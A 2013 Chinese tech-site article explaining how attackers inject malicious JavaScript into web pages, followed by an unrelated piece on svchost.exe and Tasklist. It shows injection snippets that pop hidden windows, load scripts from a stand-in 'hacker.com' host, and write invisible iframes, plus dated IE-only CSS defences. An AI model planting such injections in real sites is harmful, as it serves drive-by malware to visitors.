热点推荐:
您现在的位置: 电脑学习网 >> 网络技术 >> 正文

了解JS挂马方式

2013-09-12 14:54:12  来源: 网络技术 

  IFRAME挂马方式比较早,相应的预防措施也比较多,其中用CSS配合JS脚本进行预防是主流方式。可这种预防方式也存在安全隐患,JS脚本也可以被用来挂马,令人防不胜防。我们下面要介绍反击JS挂马的方法。
  
  文章要点:了解JS挂马方式
  文章难度:★★
  学习进程:√ IFRAME挂马
   √ JS挂马
   CSS挂马
   ……
  HNC网络联盟刘思杨:安全工程师,曾经负责过许多单位的网络安全
  许多人认为,只要自己的服务器安全做得足够好,建站程序补丁打得勤快,就能够抵御住所有黑客的攻击。这样做的人肯定是非常多的,可为什么还是有许多网站被黑呢?
  一个很重要的原因,就是他们过于相信从第三方网站中下载的整站程序,或者修改版的论坛程序等,而这些程序有些已经被黑客做过手脚,已经植入了后门,此时如果网站站长不熟悉如何查补漏洞,将无异于引狼入室。
  比较典型的一个例子是,曾经非常出名的《易想多用户商城 v2.1》(仿淘宝版),被许多黑客窜改过,多个关键页面被植入了后门,然后到处提供下载,导致了许多使用该程序的网站被攻击。因此在隐蔽手段挂马横行的今天,熟悉并掌握隐蔽的挂马方式,是一个安全工程师必备的技能。
JS挂马溯源
  古人云:人算不如天算,天算不如暗算(小编:哪个古人这样云过?)。wWw.ITcOMpUTER.cOm.Cn当IFRAME逐渐被黑客滥用的时候,有经验的安全工程师也开始研究相应的对策,一段时间内各种阻止IFRAME挂马的方法不断涌现,其中通用性较高的就是利用CSS配合JS脚本防御IFRAME挂马。
  而黑客也发现,很多网站都会让网页调用JS脚本来实现广告等诸多特效,如果将木马挂在JS脚本中,所有调用该JS脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此JS脚本挂马逐渐开始被黑客应用。
  小百科:JS脚本是JavaScript脚本语言的简称,它是一种面向对象的脚本语言,目前广泛用于动态网页的编程。需要提示大家的是,JavaScript和Java除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的。而JavaScript与Jscript也不同,Jscript是微软为了迎战JavaScript推出的脚本语言。
  虽然JavaScript作为给非程序人员的脚本语言向大众推广,但是JavaScript是一门具有丰富特性的语言,它有着和其他编程语言一样的复杂性。实际上,你必须对JS有扎实的理解才能用它来编写比较复杂的程序,作为一名安全工程师,掌握JS脚本在工作中会有很大的帮助。
 挂马原理一点通
  JS脚本挂马对于黑客而言,可以说优点多得数不过来,首先JS脚本在挂马时可以直接将JS代码写在网页中,也可以通过注入网页,让网站远程调取异地JS脚本。此外,JS挂马插入Web页面的方法有几十种,绝对够菜鸟们眼花缭乱,无从辨别木马在何处。
  IFRAME挂马相对于安全工程师而言,如同一个穿着鲜红颜色外衣的劫匪,招摇而扎眼,很容易被发现。但是利用JS挂马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在安全工程师搜查时,很容易蒙混过关,导致木马久杀不绝。
JS挂马攻防实录
  攻现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行(图1),这种方法使用的关键代码如下:

  window.open("http://www.hacker.com/木.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
  这种代码往往很长,很容易被安全工程师发现,而且没有经验的黑客也喜欢将“width”和“height=”参数设为“0”,但是设置为0后,可能会出现恶意代码不运行的情况。
  另外一种JS挂马方式是,黑客先将挂马脚本代码“document.write('')”,写入Windows中的写字板另存为后缀为.js的脚本文件,并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入:
  <script src="http://www.hacker.com/木马脚本.js"></script>
  或者
  document.write("<div style='display:none'>")
  document.write("<iframe src="网页木马地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>")
  document.write("</div>")
  就成功地将木马挂到了对方的网页中了。
  小提示:黑客还可以根据情况随机变换插入的JS挂马方法,例如黑客有可能会将脚本写为:<div style="behaviour: url(http://www.hacker.com/木马脚本.js);">或者<if rame src="vbscript:[挂马脚本]">等。
  防第一种JS挂马方式,不方便,用得非常少,而第二种JS挂马方式才是当前主流的,所以我们主要针对它进行防御。方法就是阻止Src请求的异地外域的JS脚本,代码如下:
  iframe{mdy1:expression(this.src='about:blank',this.outerHTML='');}
  script{mzm2:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
  不过这种方法的缺点就是网站的访问者将不能看到被挂了JS木马的相关网页(图2)。

  所以我们为安全工程师提供了一段可以中止JS脚本运行的CSS代码,这段代码会让异地外域的JS文件在使用document.write()时,被document.close()强制关闭。这个时侯JS挂马的内容往往还没有来得及写完,只有部分被强制输出了,Writer后面的内容再不会被写入访问者的电脑中,从而起到防范JS脚本挂马的作用。
  <title>让JS挂马中止的CSS代码</title>
  <style type="text/css" id="shudoo">
  /*<![CDATA[*/
  if rame{mdy1:expression(this.src='about:blank',this.outerHTML='');}
  script{mzm2:expression((this.src.indexOf('http')==0)?document.close():'');}
  /*]]>*/
  我们虽然能够巧妙地利用CSS代码防范IFRAME和JS脚本挂马,但是为什么网页挂马还是层出不穷?这恐怕就要说一说CSS挂马了……

 

了解Svchost.exe进程中的服务 我们知道Windows和Windows的应用软件都要使用大量的DLL(Dynamic Link Libraries,动态链接库)文件,这些DLL文件一般都要向Windows申请各种各样的Service(服务),而Svchost.exe就是其中一些服务的通用管理进程名(Generic Host Process Name),简单地说,Svchost.exe是这些服务的总称。每一个Svchost.exe进程以一个Group(组)的方式分组管理各种服务,每一个Svchost.exe进程(也就是一个Svchost组)中可以同时包含多个服务。Windows XP中可以有多个Svchost.exe进程同时运行,之所以这样设计是为了更方便地分类控制和调试各个进程和服务。

  在任务管理器中只能看到Svchost.exe进程而看不到该进程所包含的服务,要想了解每个Svchost.exe进程下到底有什么服务就需要使用别的方法。点击“开始→运行”,输入“cmd”并回车,打开命令提示符窗口,输入“Tasklist /SVC”并回车就可以看到每个Svchost.exe进程及其所包含的各种服务,其中Image Name(映像名)是进程的名称,PID(Process ID)是进程标志,以数字形式表示,Services就是进程所包含的各种服务。可惜的是Tasklist只显示各种服务的缩写而不是全称,对于这些缩写一般只有对Windows 内核非常清楚的程序员才能明白其真正意义,它们主要是指网络、域名缓存、远程控制和应用程序接口等服务,当然普通的电脑用户也没有必要去过多地了解这些十分专业的名称。如果用户还想进一步了解每个进程调用的DLL文件,可以使用“Tasklist /M”这个命令。利用Tasklist还可查看指定进程的情况,例如想要查看PID为728的进程的情况,可以使用命令“Tasklist /FI "PID eq 728"”。

  Tasklist还有许多命令参数,对它感兴趣的读者可以使用Tasklist /?得到详细的帮助信息。在Windows 2000中查看各个进程及服务的命令为“tlist -s”,查看指定进程及服务的命令为“tlist PID”。

 
From:http://www.itcomputer.com.cn/Article/Network/201309/75.html
  • 上一篇文章: 没有了

  • 下一篇文章:
  • Copyright © 2005-2013 电脑知识网 Computer Knowledge   All rights reserved.